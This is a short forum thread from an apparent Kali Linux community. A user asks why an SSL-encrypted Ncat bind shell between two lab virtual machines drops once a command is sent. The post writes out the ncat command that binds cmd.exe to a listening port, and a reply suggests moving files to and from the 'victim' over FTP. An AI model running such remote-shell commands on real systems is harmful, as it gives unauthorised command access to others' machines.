Results 1 to 2 of 2

Thread: Ncat bind shell with ssl encryption

  1. #1

    Ncat bind shell with ssl encryption

    Hi guys, I'm new here.

    I try to create a bind shell between my kali linux (3.18.2 version 32 bit installed on Virtualbox) and another virtual machine Windows XP Professional 32 bit.

    I would like to create a ssl shell, so in target prompt I do: "ncat -nlvp 1234 -e cmd.exe --allow <kali_ip> --ssl", and in my kali terminal i write "ncat -nv <xp_ip> 1234 --ssl"

    The shell run, so in my kali terminal i see windows xp prompt "C:\Windows\...>" and Windows machine remain in listening, but if I try to do a command in my kali terminal "example -dir-" the connection stop.

    Without --ssl command the shell works!

    Any ideas about?

    Thanks

  2. #2
    Join Date
    2013-Apr
    Location
    Kali forums
    Posts
    805
    Shells can sometimes be weird with interactive commands. Can you run non-interactive commands within the shell? For example, an FTP script to transfer files to/from the victim computer.

Similar Threads

  1. Replies: 0
    Last Post: 2017-05-11, 11:22
  2. Installation of Bind & Krb5 Help Wanted!
    By surahippy in forum General Archive
    Replies: 0
    Last Post: 2015-02-03, 23:17

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •